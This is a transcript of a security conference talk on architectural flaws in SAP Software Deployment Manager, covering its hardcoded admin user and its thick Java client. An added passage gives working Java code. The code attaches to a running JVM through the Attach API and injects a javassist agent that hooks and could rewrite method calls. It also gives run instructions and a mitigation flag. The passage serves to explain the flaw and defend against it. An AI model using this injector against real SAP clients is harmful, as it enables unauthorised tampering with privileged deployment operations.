Evgeny Neyolov - Dev System Hacking — Arch Bugs in SAP SDM
TRANSCRIPT
Invest in security to secure investments
Arch bugs in SAP Software Deployment Manager
Evgeny Neyolov feat. Dmitry Chastuhin, ERP Security Analyst
SAP NetWeaver Development Infrastructure
• Design Time Repository (DTR)
• Component Build Service (CBS)
• Change Management Service (CMS)
• System Landscape Directory (SLD) / NS
• Software Deployment Manager (SDM)
erpscan.com 2ERPScan — invest in security to secure investments
SAP NetWeaver Development Infrastructure (architecture diagram slides)
Software Deployment Manager
• Single interface for deployment
• Deploys apps (*.ear, *.war, *.sda)
• Used to implement custom patches
• Only one user at a time
• Only a single hardcoded admin user
SDM + UME = Love
• User Management Engine
• Affects almost all SAP Java components
SDM Attack Intro
• Thick-client Java application (sad story)
• SAP ships its own SAP Java Virtual Machine (JVM)
• Java 6 has the Attach API
• Attach to another JVM at runtime
• Intercept and modify calls
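The technique behind the last three bullets, as an added example that is not code from the talk or from SAP: an injector that uses the Java 6 Attach API to load an agent into an already running JVM, and an agent that re-transforms a target class so that every call to a chosen method is intercepted before its original body runs. Class names, the `fully.qualified.Class#method` argument format and the hooked method are hypothetical placeholders; the agent assumes javassist is bundled in the agent jar (on Java 6 to 8 the injector also needs the JDK's tools.jar on its classpath, where `com.sun.tools.attach` lives).

```java
// File: AttachInjector.java  (hypothetical name; added example, not from the talk)
// Java 6-8: com.sun.tools.attach is in the JDK's tools.jar, not the JRE.
import com.sun.tools.attach.VirtualMachine;
import com.sun.tools.attach.VirtualMachineDescriptor;

public class AttachInjector {
    public static void main(String[] args) throws Exception {
        if (args.length != 3) {
            System.err.println("usage: AttachInjector <main-class-substring> <agent.jar> <fully.qualified.Class#method>");
            System.exit(2);
        }
        String needle = args[0], agentJar = args[1], hook = args[2];
        // Only JVMs running under the same OS user are listed and attachable.
        for (VirtualMachineDescriptor d : VirtualMachine.list()) {
            if (!d.displayName().contains(needle)) continue;
            VirtualMachine vm = VirtualMachine.attach(d.id());
            try {
                // Loads the agent jar into the *running* target and calls its agentmain().
                vm.loadAgent(agentJar, hook);
                System.out.println("agent loaded into pid " + d.id() + " (" + d.displayName() + ")");
            } finally {
                vm.detach();
            }
        }
    }
}

// File: CallHookAgent.java  (hypothetical name; packaged into agent.jar together with
// javassist, with MANIFEST.MF entries "Agent-Class: CallHookAgent" and
// "Can-Retransform-Classes: true")
import java.io.ByteArrayInputStream;
import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import javassist.LoaderClassPath;

public class CallHookAgent {
    // agentArgs is "fully.qualified.Class#method", passed through by the injector.
    public static void agentmain(String agentArgs, Instrumentation inst) throws Exception {
        String[] parts = agentArgs.split("#", 2);
        final String className = parts[0];
        final String methodName = parts[1];
        inst.addTransformer(new ClassFileTransformer() {
            public byte[] transform(ClassLoader loader, String name, Class<?> cls,
                                    ProtectionDomain pd, byte[] bytes) throws IllegalClassFormatException {
                if (!name.replace('/', '.').equals(className)) return null; // leave other classes untouched
                try {
                    ClassPool pool = ClassPool.getDefault();
                    if (loader != null) pool.appendClassPath(new LoaderClassPath(loader));
                    CtClass ct = pool.makeClass(new ByteArrayInputStream(bytes));
                    for (CtMethod m : ct.getDeclaredMethods()) {
                        if (!m.getName().equals(methodName)) continue;
                        // Inserted code runs inside the target before the original body:
                        // $args is javassist's Object[] view of the call's arguments, so the
                        // same hook could rewrite them instead of only logging them.
                        m.insertBefore("{ System.err.println(\"[hook] " + methodName
                                + " called with \" + java.util.Arrays.toString($args)); }");
                    }
                    byte[] out = ct.toBytecode();
                    ct.detach();
                    return out;
                } catch (Exception e) {
                    e.printStackTrace();
                    return null; // on failure keep the original bytecode
                }
            }
        }, true); // canRetransform = true
        // A long-running client has usually loaded the class already, so force a re-transformation.
        for (Class<?> c : inst.getAllLoadedClasses()) {
            if (c.getName().equals(className) && inst.isModifiableClass(c)) {
                inst.retransformClasses(c);
            }
        }
    }
}
```

Run as `java -cp tools.jar:. AttachInjector <display-name-substring> agent.jar some.Class#someMethod` while the target client is running. Re-transformation may only change method bodies, which is why the hook uses `insertBefore` rather than adding fields or changing signatures. The precondition that matters for the thick-client story is the first comment in the injector: the Attach API only reaches JVMs running as the same OS user, so anything executing under the operator's account can hook the client this way. On HotSpot-based JVMs the mechanism can be switched off with `-XX:+DisableAttachMechanism`; whether a given SAP JVM build honours that flag should be checked rather than assumed.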
SDM Post Exploitation (slides)